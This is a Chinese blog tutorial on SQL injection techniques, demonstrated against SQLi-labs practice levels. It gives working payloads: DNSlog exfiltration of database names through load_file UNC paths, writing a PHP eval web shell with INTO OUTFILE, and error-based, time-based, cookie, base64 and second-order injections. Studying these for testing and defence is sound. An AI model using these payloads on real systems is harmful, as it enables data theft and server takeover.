渗透测试之SQL注入(读写文件、dnslog盲注、宽字节注入、User-Agent注入、Referer注入、Cookie注入、二次注入)

最新推荐文章于 2024-04-08 20:37:06 发布
最新推荐文章于 2024-04-08 20:37:06 发布
阅读量1.1k 收藏 5
点赞数 1
分类专栏: 渗透测试 文章标签: sql 安全 dnslog盲注
只能看不能摸哟!
本文链接:https://blog.csdn.net/weixin_45677145/article/details/110958251
版权

文章目录


mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以利用SQL注入漏洞对文件进行读写(但前提是权限足够)。

前提条件:

  1. 当前用户具有文件权限,尽量具有root权限
    查询是否有文件权限:select File_priv from mysql.user where user = 'root' and host = 'localhost';
    在这里插入图片描述

  2. secure_file_priv不为NULL

secure_file_priv参数说明:
该参数在高版本的mysql数据库中限制了文件的导入导出操作。该参数可以写在my.ini配置文件中[mysqld]下。若要配置此参数,需要修改my.ini配置文件,并重启mysql服务。

参数配置含义
secure_file_priv=不对mysqld的导入导出操作进行限制
secure_file_priv=null不允许导入导出操作
secure_file_priv=‘c:/a/’限制mysqld的导入导出操作只对子目录有效

查看变量的值
在这里插入图片描述

show variables like '%secure%';

修改变量
在这里插入图片描述
重启mysql服务之后查看
在这里插入图片描述

  1. 要知道文件的绝对路径

读取文件操作

load_file(‘pwd’) 函数可以读取文件的内容
这样我们就可以再注入中使用它来读取我们想要的文件的内容,例如:联合查询中读取它本地的host文件
在这里插入图片描述

dnslog平台盲注

免费的dnslog平台:
http://www.dnslog.cn/
http://ceye.io/

load_file()这个函数还可以和dnslog平台配合进行盲注,由于load_file()函数可以使用UNC来访问资源,注意只有Windows才有这个,所以这个只能在windows上使用。

当我们进行盲注的时候,就可以使用dnslog平台做回显(使用ceye.io进行演示):
payload:select load_file(concat('\\\\',(select database()),'.0ox095.ceye.io\\aaa'))

原理:就是load_file()函数可以访问unc路径发送dns请求进行域名解析,然后就会在dnslog上进行回显(解析记录)。

上面的payload相当于访问了database().abcdef.ceye.io,他会先在数据库里将database()进行查询之后再进行域名解析,这样dnslog平台上会有解析记录,database()就会显示出来
在这里插入图片描述

写入文件操作

into outfile 语句:
在这里插入图片描述
我们访问一下:
在这里插入图片描述
我们也可以写入WebShell,php一句话木马:<?php @eval($_POST['x']);?>,使用蚁剑或者菜刀连接。
x会被当作命令来执行,并且屏蔽了错误警告。
在这里插入图片描述
访问:在这里插入图片描述
使用蚁剑进行连接,就可以操控对方电脑文件
在这里插入图片描述

宽字节注入

宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。
GBK占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符集。
%DF会被PHP当中的 addslashes()函数转义为“%DF\”,“\”是URL里的“%5C”,那么也就是说,“%DF""会被转成“%DF%5C”倘若网站的字符集是GBK,MYSQL使用的编码也是GBK的话,就会认为“%DF%5C”是一个宽字符。

为了说明宽字节注入问题,我们以SQLi-labs 32关为例子。

使用[?id=1’]进行测试的时候,发现提交的单引号会被转义[’]。此时,转义后的单引号不再是字符串的标识,会被作为普通字符带入数据库查询。也就是说,我们提交的单引号不会影响到原来SQL语句的结构。
在这里插入图片描述

这是怎么回事呢?我们通过阅读32关的源码,发现:
此网页在连接数据库时,会将字符编码设置为GBK编码集合,然后进行SQL语句拼接,最后进行数据库查询。

GBK编码依然采用双字节编码方案,其编码范围:8140-FEFE,剔除xx7F码位,共23940个码位。共收录汉字和图形符号21886个,其中汉字(包括部首和构件)21003个,图形符号883个。GBK编码支持国际标准ISO/IEC10646-1和国家标准GB13000-1中的全部中日韩汉字,并包含了BIG5编码中的所有汉字。GBK编码方案于1995年12月15日正式发布,这一版的GBK规范为1.0版。
转移字符[]的编码是5c,正好在GBK编码范围之内,也就是说我们可以在单引号之前提交一个十六进制编码的字符,与5c组成一个GBK编码的汉字。这样SQL语句传入数据库的时候,转义字符5c 会被看作GBK汉字的低位字节编码,从而失去转义的作用。
在这里插入图片描述

如果我们提交这样的参数[?id=1%df’],就可以查看报错信息使用联合查询进行注入了。
在这里插入图片描述

发现是字符型的,直接进行联合查询:
在这里插入图片描述
这样我们就可以查询我们想要获取的信息了
在这里插入图片描述

User-Agent注入

less18为例:'and updatexml(1,concat('^' , (select database()),'^'),1) or '1'='1
在这里插入图片描述

Referer注入

less19为例:' or if(length(database())>5,sleep(5),1) or '1'='1
在这里插入图片描述

Cookie注入

我们使用SQLi-labs第20关来说明Cookie 注入问题。
通过bp抓包来进行注入:
在这里插入图片描述
报错注入:' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
在这里插入图片描述

Cookie 注入的注入参数需要通过Cookie提交,我们也可以通过[document.cookie]在控制台完成对浏览Cookie的读写。
来到less-20,在控制台输入
document.cookie = "uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #"
在这里插入图片描述
然后刷新浏览器:
在这里插入图片描述

base64注入

我们以SQLI-labs第22关来说明base64 注入的问题。

base64 注入也是比较简单的,属于Cookie注入,只不过将注入字段经过base64编码。
使用bp进行抓包:
在这里插入图片描述
首先我们判断%3D是url编码,还原回去是=号,然后我们将得到的编码进行base64解码,得到:
在这里插入图片描述
然后我们将要注入的sql语句进行base64编码之后再加进去就行了

用双引号测试一下:在这里插入图片描述
发现报错了,这时候我们就可以使用报错注入:
在这里插入图片描述
我们也可以通过[document.cookie]在控制台完成对浏览Cookie的读写。
在浏览器控制台直接输入:document.cookie="uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpICM="
然后刷新浏览器:
在这里插入图片描述

二次注入

less24为例:

进行代码审计:查看注册时的代码,发现没有进行--注释符号的过滤
在这里插入图片描述
查看修改密码的代码:
在这里插入图片描述
这时候我们就可以有想法了!
我们注册一个用户名为admin' --的用户,然后修改密码,会发生什么事情呢?

首先我们先查看一下数据库里的用户:
在这里插入图片描述

打开注册页面进行注册
在这里插入图片描述
注册成功!进行登录
在这里插入图片描述
登录之后可以修改密码:
在这里插入图片描述
在这里插入图片描述

修改完成之后,我们再次查看数据库:
在这里插入图片描述
发现一个神奇的事情,admin用户的密码被改写了,但是我们注册的新用户密码却没变。
这时候我们就可以利用修改密码后的admin用户进行登录,可能它的权限很高呢!

二次注入的危害

注入payload触发二次sql注入
注入payload触发XSS攻击

我是大肥鼠
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
24-4 SQL 注入 - http头注入referer注入
weixin_43263566的博客
02-28 348
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 4605
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
CTFHub - Refer注入
Have_a_great_day的博客
09-12 595
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
sql学习5(cookie注入,UA注入refer注入,过滤空格)
最新发布
cyy001128的博客
04-08 1111
获取cookie可免密登录管理员账户Cookie通常被用来辨别用户身份,就是保存用户的账号和密码用来自动登录网站cookie注入的基本条件:使用了request方法,但是注入保护程序中只对get\post方法提交的数据进行了过滤。
渗透测试-注入攻击专题
aming小老弟
03-11 2009
sql手工注入 @apache+php+Mysql 正则注入 0x01 Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union sele
SQLilabs的第19关——http请求头注入(Referer)(报错注入
qq_73393033的博客
07-22 360
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
360通用asp防护代码(防sql注入)
09-29
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL语句来操纵数据库,获取、修改或删除敏感信息。360通用ASP防护代码旨在解决这个问题,防止SQL注入和跨站攻击,提高网站的安全性。 SQL注入防护主要涉及...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
Web安全SQL注入精讲视频.zip
04-16
2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入.mp4 2-4 报错注入.mp4 2-5 双注入.mp4 2-6 布尔盲注.mp4 2-7 时间盲注.mp4 2-8 Cookie注入.mp4 2-9 HTTP-Referer注入.mp4 3-1 ...
Sqlmap2021 -- Referer注入
weixin_41489908的博客
07-07 1918
一直向前走,天总会亮的。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包,将封包内容保存到referer.txt POST /sqli/Less-19/ HTTP/1.1 Host: 192.168.139.129 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.139.129 Content-Type: a..
SQL注入总结(一)
guanjian_ci的博客
02-19 490
第一部分:常规注入(数据有回显前端) 第一步:测试数据类型 1.数字型 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 2.字符型 id=1‘ and ’1‘=’1 页面正常 id=1‘ and ’1‘=’2 页面不正常 3.睡眠判断(数据不回显前端时使用) id=1' and sleep(10)--+ 页面缓冲10秒说明判断正确 4.开发常用接受参数的类型 数字型: id=$id 字符型: ...
Less19 (referer注入)
老司机开代码的博客
08-03 1626
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求头中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
渗透SQL注入
Jian Sun_的博客
05-17 807
SQL注入攻击 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. 注:来源于百度百科 SQL的危害及
渗透测试——五、网站漏洞——SQL注入
热门推荐
钟言的博客
12-05 1万+
本篇为学习渗透测试第五课,网站漏洞即SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
渗透测试SQL注入
weixin_43988774的博客
04-02 5760
SQL注入 SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句 sql注入漏洞的产生需要满足 参数用户可控 - 前端传给后端的参数是用户可以控制的 参数代入数据库查询 - 传入的参数拼接到SQL语句,且带入数据库查询 sql注入漏洞的分类: 从注入点区分 数字型注入 字符型注入注入方式区分 报错注入 延时注入 堆叠注入(联合查询注入) 布尔注入盲注宽字节注入 cookie
渗透测试学习笔记(一)注入
weixin_40138844的博客
10-29 399
注入的利用范围: (1)获取数据库信息(网站数据) (2)拿到web权限,或者服务器权限。 注入的发现和防护 (1)人为发现探测(手工探测,理解) (2)工具扫描(avws,appscan等) (3)CMS 修复 (1)代码修复(自定义过滤函数,自带函数) (2)WAF防护(安全狗,web防火墙) 注意 (1)数据库类型 (2)参数类型 (3)提交方式(get,post,coo...
【超详细】POST注入(Less-11)、Cookie注入(Less-20)、二次注入(Less-24)、宽字节注入(Less-32)
lyy0xfff的博客
07-09 456
需要知道的一些知识: 所谓POST注入指的是我们往常传递参数的时候,在地址栏都可以看到 我们输入参数的具体值,但POST方式提交的特点就是,所提交的数据 不会在地址栏上显示。 这就需要我们对传递过来的数据进行抓包,通过拦截从而来修改我们 提交的数据,起到POST注入的效果。 0x01 首先我们根据题意,输入一个用户名和密码,系统显示你的用户名和你的密码(蓝字,可能看不请), 并且提示你成功登录 0x02 然后我们看到它的SQL语句后面的where条件存在单引号,然后我们联想到单引号注入,所以我们试试对us
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1220
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
HTTP头部注入攻击除了利用user-Agent的内容,还有哪些内容可以利用
06-03
除了User-Agent之外,HTTP头部注入攻击还可以利用以下部分: 1. Referer:Referer头部记录了用户从哪个网页链接跳转到当前页面。攻击者可以通过在Referer中注入恶意代码,来欺骗服务器认为这个请求是从一个合法的网页链接跳转过来的,从而绕过一些安全限制。 2. Host:Host头部记录了请求的目标服务器名称或IP地址。攻击者可以通过在Host中注入恶意代码,来欺骗服务器认为请求的目标服务器是合法的,从而绕过一些安全限制。 3. Accept-Language:Accept-Language头部记录了用户的语言偏好。攻击者可以通过在Accept-Language中注入恶意代码,来欺骗服务器认为这个请求是从一个合法的语言环境发起的,从而绕过一些安全限制。 4. If-None-Match:If-None-Match头部记录了请求资源的ETag值。攻击者可以通过在If-None-Match中注入恶意代码,来欺骗服务器认为请求资源没有被修改过,从而绕过一些安全限制。 因此,在开发Web应用程序时,需要注意HTTP头部注入攻击的风险,对于所有的HTTP头部都应该进行合法性验证,以确保请求的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值